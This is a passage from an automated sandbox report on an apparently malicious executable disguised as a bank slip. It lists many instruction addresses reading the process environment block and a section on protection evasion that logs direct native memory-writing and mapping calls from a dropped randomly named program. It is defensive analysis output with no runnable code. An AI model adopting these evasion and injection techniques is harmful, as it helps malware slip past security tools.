                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01868324 mov eax, dword ptr fs:[00000030h]2_2_01868324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01868324 mov ecx, dword ptr fs:[00000030h]2_2_01868324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01868324 mov eax, dword ptr fs:[00000030h]2_2_01868324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01868324 mov eax, dword ptr fs:[00000030h]2_2_01868324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h]2_2_017983C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h]2_2_017983C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h]2_2_017983C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h]2_2_017983C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01812349 mov eax, dword ptr fs:[00000030h]2_2_01812349
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0186634F mov eax, dword ptr fs:[00000030h]2_2_0186634F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01838350 mov ecx, dword ptr fs:[00000030h]2_2_01838350
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0185A352 mov eax, dword ptr fs:[00000030h]2_2_0185A352
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov ecx, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181035C mov eax, dword ptr fs:[00000030h]2_2_0181035C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788397 mov eax, dword ptr fs:[00000030h]2_2_01788397
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788397 mov eax, dword ptr fs:[00000030h]2_2_01788397
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01788397 mov eax, dword ptr fs:[00000030h]2_2_01788397
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E388 mov eax, dword ptr fs:[00000030h]2_2_0178E388
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E388 mov eax, dword ptr fs:[00000030h]2_2_0178E388
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178E388 mov eax, dword ptr fs:[00000030h]2_2_0178E388
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B438F mov eax, dword ptr fs:[00000030h]2_2_017B438F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B438F mov eax, dword ptr fs:[00000030h]2_2_017B438F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183437C mov eax, dword ptr fs:[00000030h]2_2_0183437C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01810283 mov eax, dword ptr fs:[00000030h]2_2_01810283
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01810283 mov eax, dword ptr fs:[00000030h]2_2_01810283
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01810283 mov eax, dword ptr fs:[00000030h]2_2_01810283
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178826B mov eax, dword ptr fs:[00000030h]2_2_0178826B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794260 mov eax, dword ptr fs:[00000030h]2_2_01794260
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794260 mov eax, dword ptr fs:[00000030h]2_2_01794260
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01794260 mov eax, dword ptr fs:[00000030h]2_2_01794260
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796259 mov eax, dword ptr fs:[00000030h]2_2_01796259
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov ecx, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018262A0 mov eax, dword ptr fs:[00000030h]2_2_018262A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A250 mov eax, dword ptr fs:[00000030h]2_2_0178A250
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178823B mov eax, dword ptr fs:[00000030h]2_2_0178823B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018662D6 mov eax, dword ptr fs:[00000030h]2_2_018662D6
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02E1 mov eax, dword ptr fs:[00000030h]2_2_017A02E1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02E1 mov eax, dword ptr fs:[00000030h]2_2_017A02E1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02E1 mov eax, dword ptr fs:[00000030h]2_2_017A02E1
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A2C3 mov eax, dword ptr fs:[00000030h]2_2_0179A2C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01818243 mov eax, dword ptr fs:[00000030h]2_2_01818243
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01818243 mov ecx, dword ptr fs:[00000030h]2_2_01818243
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184A250 mov eax, dword ptr fs:[00000030h]2_2_0184A250
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184A250 mov eax, dword ptr fs:[00000030h]2_2_0184A250
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02A0 mov eax, dword ptr fs:[00000030h]2_2_017A02A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A02A0 mov eax, dword ptr fs:[00000030h]2_2_017A02A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0186625D mov eax, dword ptr fs:[00000030h]2_2_0186625D
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01840274 mov eax, dword ptr fs:[00000030h]2_2_01840274
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE284 mov eax, dword ptr fs:[00000030h]2_2_017CE284
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CE284 mov eax, dword ptr fs:[00000030h]2_2_017CE284
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C656A mov eax, dword ptr fs:[00000030h]2_2_017C656A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C656A mov eax, dword ptr fs:[00000030h]2_2_017C656A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C656A mov eax, dword ptr fs:[00000030h]2_2_017C656A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018105A7 mov eax, dword ptr fs:[00000030h]2_2_018105A7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018105A7 mov eax, dword ptr fs:[00000030h]2_2_018105A7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018105A7 mov eax, dword ptr fs:[00000030h]2_2_018105A7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798550 mov eax, dword ptr fs:[00000030h]2_2_01798550
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798550 mov eax, dword ptr fs:[00000030h]2_2_01798550
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE53E mov eax, dword ptr fs:[00000030h]2_2_017BE53E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A0535 mov eax, dword ptr fs:[00000030h]2_2_017A0535
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01826500 mov eax, dword ptr fs:[00000030h]2_2_01826500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864500 mov eax, dword ptr fs:[00000030h]2_2_01864500
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC5ED mov eax, dword ptr fs:[00000030h]2_2_017CC5ED
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CC5ED mov eax, dword ptr fs:[00000030h]2_2_017CC5ED
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017925E0 mov eax, dword ptr fs:[00000030h]2_2_017925E0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BE5E7 mov eax, dword ptr fs:[00000030h]2_2_017BE5E7
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796A50 mov eax, dword ptr fs:[00000030h]2_2_01796A50
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B4A35 mov eax, dword ptr fs:[00000030h]2_2_017B4A35
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B4A35 mov eax, dword ptr fs:[00000030h]2_2_017B4A35
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BEA2E mov eax, dword ptr fs:[00000030h]2_2_017BEA2E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CCA24 mov eax, dword ptr fs:[00000030h]2_2_017CCA24
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181CA11 mov eax, dword ptr fs:[00000030h]2_2_0181CA11
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CAAEE mov eax, dword ptr fs:[00000030h]2_2_017CAAEE
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CAAEE mov eax, dword ptr fs:[00000030h]2_2_017CAAEE
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01790AD0 mov eax, dword ptr fs:[00000030h]2_2_01790AD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C4AD0 mov eax, dword ptr fs:[00000030h]2_2_017C4AD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C4AD0 mov eax, dword ptr fs:[00000030h]2_2_017C4AD0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E6ACC mov eax, dword ptr fs:[00000030h]2_2_017E6ACC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E6ACC mov eax, dword ptr fs:[00000030h]2_2_017E6ACC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E6ACC mov eax, dword ptr fs:[00000030h]2_2_017E6ACC
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798AA0 mov eax, dword ptr fs:[00000030h]2_2_01798AA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01798AA0 mov eax, dword ptr fs:[00000030h]2_2_01798AA0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017E6AA4 mov eax, dword ptr fs:[00000030h]2_2_017E6AA4
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183EA60 mov eax, dword ptr fs:[00000030h]2_2_0183EA60
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C8A90 mov edx, dword ptr fs:[00000030h]2_2_017C8A90
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180CA72 mov eax, dword ptr fs:[00000030h]2_2_0180CA72
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180CA72 mov eax, dword ptr fs:[00000030h]2_2_0180CA72
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtMapViewOfSection: Direct from: 0x76F02D1C
